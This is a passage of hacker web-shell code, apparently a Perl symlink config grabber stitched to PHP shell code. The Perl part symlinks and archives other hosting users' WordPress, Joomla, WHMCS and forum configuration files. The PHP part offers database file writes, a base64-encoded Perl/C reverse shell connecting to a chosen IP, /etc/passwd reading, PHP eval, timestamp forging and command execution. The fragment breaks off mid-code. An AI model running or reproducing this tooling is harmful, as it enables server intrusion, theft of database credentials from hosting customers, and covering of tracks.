sub lil{
    ($user) = @_;
$msr = qx{pwd};
$kola=$msr."/".$user;
$kola=~s/\n//g;
symlink('/home/'.$user.'/public_html/includes/configure.php',$kola.'-shop.txt');
symlink('/home/'.$user.'/public_html/os/includes/configure.php',$kola.'-shop-os.txt');
symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$kola.'-oscom.txt');
symlink('/home/'.$user.'/public_html/oscommerce/includes/configure.php',$kola.'-oscommerce.txt');
symlink('/home/'.$user.'/public_html/oscommerces/includes/configure.php',$kola.'-oscommerces.txt');
symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$kola.'-shop2.txt');
symlink('/home/'.$user.'/public_html/shopping/includes/configure.php',$kola.'-shop-shopping.txt');
symlink('/home/'.$user.'/public_html/sale/includes/configure.php',$kola.'-sale.txt');
symlink('/home/'.$user.'/public_html/amember/config.inc.php',$kola.'-amember.txt');
symlink('/home/'.$user.'/public_html/config.inc.php',$kola.'-amember2.txt');
symlink('/home/'.$user.'/public_html/members/configuration.php',$kola.'-members.txt');
symlink('/home/'.$user.'/public_html/config.php',$kola.'-4images1.txt');
symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'-forum.txt');
symlink('/home/'.$user.'/public_html/forums/includes/config.php',$kola.'-forums.txt');
symlink('/home/'.$user.'/public_html/admin/conf.php',$kola.'-5.txt');
symlink('/home/'.$user.'/public_html/admin/config.php',$kola.'-4.txt');
symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'-wp13.txt');
symlink('/home/'.$user.'/public_html/wp/wp-config.php',$kola.'-wp13-wp.txt');
symlink('/home/'.$user.'/public_html/WP/wp-config.php',$kola.'-wp13-WP.txt');
symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$kola.'-wp13-wp-beta.txt');
symlink('/home/'.$user.'/public_html/beta/wp-config.php',$kola.'-wp13-beta.txt');
symlink('/home/'.$user.'/public_html/press/wp-config.php',$kola.'-wp13-press.txt');
symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$kola.'-wp13-wordpress.txt');
symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$kola.'-wp13-Wordpress.txt');
symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'-wp13-Wordpress.txt');
symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$kola.'-wp13-wordpress-beta.txt');
symlink('/home/'.$user.'/public_html/news/wp-config.php',$kola.'-wp13-news.txt');
symlink('/home/'.$user.'/public_html/new/wp-config.php',$kola.'-wp13-new.txt');
symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'-wp-blog.txt');
symlink('/home/'.$user.'/public_html/beta/wp-config.php',$kola.'-wp-beta.txt');
symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$kola.'-wp-blogs.txt');
symlink('/home/'.$user.'/public_html/home/wp-config.php',$kola.'-wp-home.txt');
symlink('/home/'.$user.'/public_html/protal/wp-config.php',$kola.'-wp-protal.txt');
symlink('/home/'.$user.'/public_html/site/wp-config.php',$kola.'-wp-site.txt');
symlink('/home/'.$user.'/public_html/main/wp-config.php',$kola.'-wp-main.txt');
symlink('/home/'.$user.'/public_html/test/wp-config.php',$kola.'-wp-test.txt');
symlink('/home/'.$user.'/public_html/arcade/functions/dbclass.php',$kola.'-ibproarcade.txt');
symlink('/home/'.$user.'/public_html/arcade/functions/dbclass.php',$kola.'-ibproarcade.txt');
symlink('/home/'.$user.'/public_html/joomla/configuration.php',$kola.'-joomla2.txt');
symlink('/home/'.$user.'/public_html/protal/configuration.php',$kola.'-joomla-protal.txt');
symlink('/home/'.$user.'/public_html/joo/configuration.php',$kola.'-joo.txt');
symlink('/home/'.$user.'/public_html/cms/configuration.php',$kola.'-joomla-cms.txt');
symlink('/home/'.$user.'/public_html/site/configuration.php',$kola.'-joomla-site.txt');
symlink('/home/'.$user.'/public_html/main/configuration.php',$kola.'-joomla-main.txt');
symlink('/home/'.$user.'/public_html/news/configuration.php',$kola.'-joomla-news.txt');
symlink('/home/'.$user.'/public_html/new/configuration.php',$kola.'-joomla-new.txt');
symlink('/home/'.$user.'/public_html/home/configuration.php',$kola.'-joomla-home.txt');
symlink('/home/'.$user.'/public_html/vb/includes/config.php',$kola.'-vb~config.txt');
symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$kola.'-vb3~config.txt');
symlink('/home/'.$user.'/public_html/cc/includes/config.php',$kola.'-vb1~config.txt');
symlink('/home/'.$user.'/public_html/includes/config.php',$kola.'-includes-vb.txt');
symlink('/home/'.$user.'/public_html/forum/includes/class_core.php',$kola.'-vbluttin~class_core.php.txt');
symlink('/home/'.$user.'/public_html/vb/includes/class_core.php',$kola.'-vbluttin~class_core.php1.txt');
symlink('/home/'.$user.'/public_html/cc/includes/class_core.php',$kola.'-vbluttin~class_core.php2.txt');
symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.'-whm15.txt');
symlink('/home/'.$user.'/public_html/central/configuration.php',$kola.'-whm-central.txt');
symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$kola.'-whm-whmcs.txt');
symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$kola.'-whm-WHMCS.txt');
symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$kola.'-whmc-WHM.txt');
symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$kola.'-whmcs.txt');
symlink('/home/'.$user.'/public_html/support/configuration.php',$kola.'-support.txt');
symlink('/home/'.$user.'/public_html/supp/configuration.php',$kola.'-supp.txt');
symlink('/home/'.$user.'/public_html/secure/configuration.php',$kola.'-sucure.txt');
symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$kola.'-sucure-whm.txt');
symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$kola.'-sucure-whmcs.txt');
symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$kola.'-cpanel.txt');
symlink('/home/'.$user.'/public_html/panel/configuration.php',$kola.'-panel.txt');
symlink('/home/'.$user.'/public_html/host/configuration.php',$kola.'-host.txt');
symlink('/home/'.$user.'/public_html/hosting/configuration.php',$kola.'-hosting.txt');
symlink('/home/'.$user.'/public_html/hosts/configuration.php',$kola.'-hosts.txt');
symlink('/home/'.$user.'/public_html/configuration.php',$kola.'-joomla.txt');
symlink('/home/'.$user.'/public_html/submitticket.php',$kola.'-whmcs2.txt');
symlink('/home/'.$user.'/public_html/clients/configuration.php',$kola.'-clients.txt');
symlink('/home/'.$user.'/public_html/client/configuration.php',$kola.'-client.txt');
symlink('/home/'.$user.'/public_html/clientes/configuration.php',$kola.'-clientes.txt');
symlink('/home/'.$user.'/public_html/cliente/configuration.php',$kola.'-client.txt');
symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$kola.'-clientsupport.txt');
symlink('/home/'.$user.'/public_html/billing/configuration.php',$kola.'-billing.txt'); 
symlink('/home/'.$user.'/public_html/manage/configuration.php',$kola.'-whm-manage.txt'); 
symlink('/home/'.$user.'/public_html/my/configuration.php',$kola.'-whm-my.txt'); 
symlink('/home/'.$user.'/public_html/myshop/configuration.php',$kola.'-whm-myshop.txt'); 
symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$kola.'-zencart.txt'); 
symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$kola.'-shop-zencart.txt'); 
symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$kola.'-shop-ZCshop.txt'); 
symlink('/home/'.$user.'/public_html/Settings.php',$kola.'-smf.txt'); 
symlink('/home/'.$user.'/public_html/smf/Settings.php',$kola.'-smf2.txt'); 
symlink('/home/'.$user.'/public_html/forum/Settings.php',$kola.'-smf-forum.txt'); 
symlink('/home/'.$user.'/public_html/forums/Settings.php',$kola.'-smf-forums.txt'); 
symlink('/home/'.$user.'/public_html/upload/includes/config.php',$kola.'-up.txt');
symlink('/home/'.$user.'/public_html/article/config.php',$kola.'-Nwahy.txt'); 
symlink('/home/'.$user.'/public_html/up/includes/config.php',$kola.'-up2.txt');
symlink('/home/'.$user.'/public_html/conf_global.php',$kola.'-6.txt');
symlink('/home/'.$user.'/public_html/include/db.php',$kola.'-7.txt');
symlink('/home/'.$user.'/public_html/connect.php',$kola.'-PHP-Fusion.txt');
symlink('/home/'.$user.'/public_html/mk_conf.php',$kola.'-9.txt');
symlink('/home/'.$user.'/public_html/includes/config.php',$kola.'-traidnt1.txt');
symlink('/home/'.$user.'/public_html/config.php',$kola.'-4images.txt');
symlink('/home/'.$user.'/public_html/sites/default/settings.php',$kola.'-Drupal.txt');
symlink('/home/'.$user.'/public_html/member/configuration.php',$kola.'-1member.txt') ; 
symlink('/home/'.$user.'/public_html/billings/configuration.php',$kola.'-billings.txt') ; 
symlink('/home/'.$user.'/public_html/whm/configuration.php',$kola.'-whm.txt');
symlink('/home/'.$user.'/public_html/supports/configuration.php',$kola.'-supports.txt');
symlink('/home/'.$user.'/public_html/requires/config.php',$kola.'-AM4SS-hosting.txt');
symlink('/home/'.$user.'/public_html/supports/includes/iso4217.php',$kola.'-hostbills-supports.txt');
symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$kola.'-hostbills-client.txt');
symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$kola.'-hostbills-support.txt');
symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$kola.'-hostbills-billing.txt');
symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$kola.'-hostbills-billings.txt');
symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$kola.'-hostbills-host.txt');
symlink('/home/'.$user.'/public_html/hosts/includes/iso4217.php',$kola.'-hostbills-hosts.txt');
symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$kola.'-hostbills-hosting.txt');
symlink('/home/'.$user.'/public_html/hostings/includes/iso4217.php',$kola.'-hostbills-hostings.txt');
symlink('/home/'.$user.'/public_html/includes/iso4217.php',$kola.'-hostbills.txt');
symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$kola.'-hostbills-hostbills.txt');
symlink('/home/'.$user.'/public_html/hostbill/includes/iso4217.php',$kola.'-hostbills-hostbill.txt');

}
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
  read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
} else {
  $buffer = $ENV{'QUERY_STRING'};
}
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
  ($name, $value) = split(/=/, $pair);
  $name =~ tr/+/ /;
  $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  $value =~ tr/+/ /;
  $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  $FORM{$name} = $value;
}
if ($FORM{pass} eq ""){
print '
<body class="newStyle1">
<p>.: Damane2011-Dz :.</p>
<p>Damane-Dz@hotmail.com</p>
<form method="post">
<textarea name="pass" style="width: 543px; height: 420px"></textarea>
<br />
<input name="tar" type="text" style="width: 212px" /><br />
<input name="Submit1" type="submit" value="submit" style="width: 99px" /><br />
<p>Modified By Damane2011-Dz</p>
</form>';
}else{
@lines =<$FORM{pass}>;
$y = @lines;
open (MYFILE, ">tar.tmp");
print MYFILE "tar -czf ".$FORM{tar}.".tar ";
for ($ka=0;$ka<$y;$ka++){
while(@lines[$ka]  =~ m/(.*?):x:/g){
&lil($1);
print MYFILE $1.".txt ";
for($kd=1;$kd<18;$kd++){
print MYFILE $1.$kd.".txt ";
}
}
 }
print'<body class="newStyle1">
<p>Done !!</p>
<p>&nbsp;</p>';
if($FORM{tar} ne ""){
open(INFO, "tar.tmp");
@lines =<INFO> ;
close(INFO);
system(@lines);
print'<p><a href="'.$FORM{tar}.'.tar">Click here 2 download tar file</a></p>';
}
}
 print"
</body>
</html>";';$config = fopen("config.dam" ,"w+");$write = fwrite ($config ,base64_decode($configshell));fclose($config);chmod("config.dam",0755);echo " ";}elseif ($action == 'sqlfile') { if($doing=="mysqlupload"){ $file = $_FILES['uploadfile']; $filename = $file['tmp_name']; if (file_exists($savepath)) { m('The goal file has already existed'); } else { if(!$filename) { m('Please choose a file'); } else { $fp=@fopen($filename,'r'); $contents=@fread($fp, filesize($filename)); @fclose($fp); $contents = bin2hex($contents); if(!$upname) $upname = $file['name']; dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';"); m($result ? 'Upload success' : 'Upload has failed: '.mysql_error()); } } }?><?php !$dbhost && $dbhost = 'localhost'; !$dbuser && $dbuser = 'root'; !$dbport && $dbport = '3306'; $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1'); formhead(array('title'=>'MYSQL Information','name'=>'dbinfo')); makehide('action','sqlfile'); p('

'); p('DBHost:'); makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); p(':'); makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); p('DBUser:'); makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); p('DBPass:'); makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); p('DBName:'); makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname)); p('DBCharset:'); makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); p('

'); formfoot(); p('
'); p('

Upload file

'); p('

This operation the DB user must has FILE privilege

'); p('

Save path(fullpath): Choose a file: Upload

'); p('

Download file

'); p('

File: Download

'); makehide('dbhost'); makehide('dbport'); makehide('dbuser'); makehide('dbpass'); makehide('dbname'); makehide('charset'); makehide('doing'); makehide('action','sqlfile'); p('');}elseif ($action == 'sqladmin') { !$dbhost && $dbhost = 'localhost'; !$dbuser && $dbuser = 'root'; !$dbport && $dbport = '3306'; $dbform = ''; if(isset($dbhost)){ $dbform .= "\n"; } if(isset($dbuser)) { $dbform .= "\n"; } if(isset($dbpass)) { $dbform .= "\n"; } if(isset($dbport)) { $dbform .= "\n"; } if(isset($dbname)) { $dbform .= "\n"; } if(isset($charset)) { $dbform .= "\n"; } if ($doing == 'backupmysql' && $saveasfile) { if (!$table) { m('Please choose the table'); } else { dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); $table = array_flip($table); $fp = @fopen($path,'w'); if ($fp) { $result = q('SHOW tables'); if (!$result) p('

'.mysql_error().'

'); $mysqldata = ''; while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { sqldumptable($currow[0], $fp); } } fclose($fp); $fileurl = str_replace(SA_ROOT,'',$path); m('Database has success backup to '.$path.''); mysql_close(); } else { m('Backup failed'); } } } if ($insert && $insertsql) { $keystr = $valstr = $tmp = ''; foreach($insertsql as $key => $val) { if ($val) { $keystr .= $tmp.$key; $valstr .= $tmp."'".addslashes($val)."'"; $tmp = ','; } } if ($keystr && $valstr) { dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error()); } } if ($update && $insertsql && $base64) { $valstr = $tmp = ''; foreach($insertsql as $key => $val) { $valstr .= $tmp.$key."='".addslashes($val)."'"; $tmp = ','; } if ($valstr) { $where = base64_decode($base64); dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error()); } } if ($doing == 'del' && $base64) { $where = base64_decode($base64); $delete_sql = "DELETE FROM $tablename WHERE $where"; dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error()); } if ($tablename && $doing == 'drop') { dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); if (q("DROP TABLE $tablename")) { m('Drop table of success'); $tablename = ''; } else { m(mysql_error()); } } $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1'); formhead(array('title'=>'MYSQL Manager')); makehide('action','sqladmin'); p('

'); p('DBHost:'); makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); p(':'); makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); p('DBUser:'); makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); p('DBPass:'); makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); p('DBCharset:'); makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt')); p('

'); formfoot();?><?php // SQL formhead(array('name'=>'recordlist')); makehide('doing'); makehide('action','sqladmin'); makehide('base64'); makehide('tablename'); p($dbform); formfoot(); // Data formhead(array('name'=>'setdbname')); makehide('action','sqladmin'); p($dbform); if (!$dbname) { makehide('dbname'); } formfoot(); formhead(array('name'=>'settable')); makehide('action','sqladmin'); p($dbform); makehide('tablename'); makehide('page',$page); makehide('doing'); formfoot(); $cachetables = array(); $pagenum = 30; $page = intval($page); if($page) { $start_limit = ($page - 1) * $pagenum; } else { $start_limit = 0; $page = 1; } if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); // get mysql server $mysqlver = mysql_get_server_info(); p('

MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'

'); $highver = $mysqlver > '4.1' ? 1 : 0; // Show database $query = q("SHOW DATABASES"); $dbs = array(); $dbs[] = '-- Select a database --'; while($db = mysql_fetch_array($query)) { $dbs[$db['Database']] = $db['Database']; } makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1)); $tabledb = array(); if ($dbname) { p('

'); p('Current dababase: '.$dbname.''); if ($tablename) { p(' | Current Table: '.$tablename.' [ Insert | Structure | Drop ]'); } p('

'); mysql_select_db($dbname); $getnumsql = ''; $runquery = 0; if ($sql_query) { $runquery = 1; } $allowedit = 0; if ($tablename && !$sql_query) { $sql_query = "SELECT * FROM $tablename"; $getnumsql = $sql_query; $sql_query = $sql_query." LIMIT $start_limit, $pagenum"; $allowedit = 1; } p('
'); p('

Domains Users Symlink
This is the hidden content, please
'.$user['name']." symlink
Run SQL query/queries on database '.$dbname.':
Example VBB Password: vbateam
UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\'
'); makehide('tablename', $tablename); makehide('action','sqladmin'); p($dbform); p(''); if ($tablename || ($runquery && $sql_query)) { if ($doing == 'structure') { $result = q("SHOW COLUMNS FROM $tablename"); $rowdb = array(); while($row = mysql_fetch_array($result)) { $rowdb[] = $row; } p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); foreach ($rowdb as $row) { $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(''); } tbfoot(); } elseif ($doing == 'insert' || $doing == 'edit') { $result = q('SHOW COLUMNS FROM '.$tablename); while ($row = mysql_fetch_array($result)) { $rowdb[] = $row; } $rs = array(); if ($doing == 'insert') { p('

Insert new line in '.$tablename.' table »

'); } else { p('

Update record in '.$tablename.' table »

'); $where = base64_decode($base64); $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1"); $rs = mysql_fetch_array($result); } p(''); p($dbform); makehide('action','sqladmin'); makehide('tablename',$tablename); p('
FieldTypeNullKeyDefaultExtra
'.$row['Field'].''.$row['Type'].''.$row['Null'].' '.$row['Key'].' '.$row['Default'].' '.$row['Extra'].' 
'); foreach ($rowdb as $row) { if ($rs[$row['Field']]) { $value = htmlspecialchars($rs[$row['Field']]); } else { $value = ''; } $thisbg = bg(); p(''); p(''); } if ($doing == 'insert') { p(''); } else { p(''); makehide('base64', $base64); } p('
'.$row['Field'].'

'.$row['Type'].'

'); } else { $querys = @explode(';',$sql_query); foreach($querys as $num=>$query) { if ($query) { p("

Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."

"); switch(qy($query)) { case 0: p('

Error : '.mysql_error().'

'); break; case 1: if (strtolower(substr($query,0,13)) == 'select * from') { $allowedit = 1; } if ($getnumsql) { $tatol = mysql_num_rows(q($getnumsql)); $multipage = multi($tatol, $pagenum, $page, $tablename); } if (!$tablename) { $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query))); $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line); preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches); $tablename = $matches[1][0]; } $result = q($query); p($multipage); p(''); p(''); if ($allowedit) p(''); $fieldnum = @mysql_num_fields($result); for($i=0;$i$name

$type($len)"); } p('

'); while($mn = @mysql_fetch_assoc($result)){ $thisbg = bg(); p(''); $where = $tmp = $b1 = ''; foreach($mn as $key=>$inside){ if ($inside) { $where .= $tmp.$key."='".addslashes($inside)."'"; $tmp = ' AND '; } $b1 .= ''; } $where = base64_encode($where); if ($allowedit) p(''); p($b1); p(''); unset($b1); } tbfoot(); p($multipage); break; case 2: $ar = mysql_affected_rows(); p('

affected rows : '.$ar.'

'); break; } } } } } else { $query = q("SHOW TABLE STATUS"); $table_num = $table_rows = $data_size = 0; $tabledb = array(); while($table = mysql_fetch_array($query)) { $data_size = $data_size + $table['Data_length']; $table_rows = $table_rows + $table['Rows']; $table['Data_length'] = sizecount($table['Data_length']); $table_num++; $tabledb[] = $table; } $data_size = sizecount($data_size); unset($table); p('
Action
'.html_clean($inside).'  Edit | Del
'); p(''); makehide('action','sqladmin'); p($dbform); p(''); p(''); p(''); p(''); p(''); p(''); p(''); if ($highver) { p(''); p(''); } p(''); foreach ($tabledb as $key => $table) { $thisbg = bg(); p(''); p(''); p(''); p(''); p(''); p(''); p(''); if ($highver) { p(''); p(''); } p(''); } p(''); p(''); p(''); p(''); p(''); p(''); p(''); p(""); makehide('doing','backupmysql'); formfoot(); p("
NameRowsData_lengthCreate_timeUpdate_timeEngineCollation
'.$table['Name'].' [ Insert | Structure | Drop ]'.$table['Rows'].''.$table['Data_length'].''.$table['Create_time'].''.$table['Update_time'].''.$table['Engine'].''.$table['Collation'].'
 Total tables: '.$table_num.''.$table_rows.''.$data_size.' 
Save as file
"); fr($query); } } } tbfoot(); @mysql_close();}//end sql backupelseif ($action == 'backconnect') { !$yourip && $yourip = $_SERVER['REMOTE_ADDR']; !$yourport && $yourport = '12345'; $usedb = array('perl'=>'perl','c'=>'c'); $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; if ($start && $yourip && $yourport && $use){ if ($use == 'perl') { cf('/tmp/angel_bc',$back_connect); $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &"); } else { cf('/tmp/angel_bc.c',$back_connect_c); $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); @unlink('/tmp/angel_bc.c'); $res = execute("/tmp/angel_bc $yourip $yourport &"); } m("Now script try connect to $yourip port $yourport ..."); } formhead(array('title'=>'Back Connect')); makehide('action','backconnect'); p('

'); p('Your IP:'); makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip)); p('Your Port:'); makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport)); p('Use:'); makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use)); makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt')); p('

'); formfoot();}//end backconnect window via NCelseif ($action == 'etcpwd') {formhead(array('title'=>'Get /etc/passwd')); makehide('action','etcpwd'); makehide('dir',$nowpath);$i = 0; echo "

 

"; formfoot();}elseif ($action == 'eval') { $phpcode = trim($phpcode); if($phpcode){ if (!preg_match('#$phpcode"); } formhead(array('title'=>'Eval PHP Code')); makehide('action','eval'); maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode)); p('

This is the hidden content, please

'); formfooter();}//end evalelseif ($action == 'editfile') { if(file_exists($opfile)) { $fp=@fopen($opfile,'r'); $contents=@fread($fp, filesize($opfile)); @fclose($fp); $contents=htmlspecialchars($contents); } formhead(array('title'=>'Create / Edit File')); makehide('action','file'); makehide('dir',$nowpath); makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1)); maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents)); formfooter();}//end editfileelseif ($action == 'newtime') { $opfilemtime = @filemtime($opfile); //$time = strtotime("$year-$month-$day $hour:$minute:$second"); $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); formhead(array('title'=>'Clone file was last modified time')); makehide('action','file'); makehide('dir',$nowpath); makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1)); formfooter(); formhead(array('title'=>'Set last modified')); makehide('action','file'); makehide('dir',$nowpath); makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); p('

Instead »'); p('year:'); makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4)); p('month:'); makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2)); p('day:'); makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2)); p('hour:'); makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2)); p('minute:'); makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2)); p('second:'); makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2)); p('

'); formfooter();}//end newtimeelseif ($action == 'shell') { if (IS_WIN && IS_COM) { if($program && $parameter) { $shell= new COM('Shell.Application'); $a = $shell->ShellExecute($program,$parameter); m('Program run has '.(!$a ? 'success' : 'fail')); } !$program && $program = 'c:\windows\system32\cmd.exe'; !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt'; formhead(array('title'=>'Execute Program')); makehide('action','shell'); makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1)); p('

'); makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter)); makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); p('

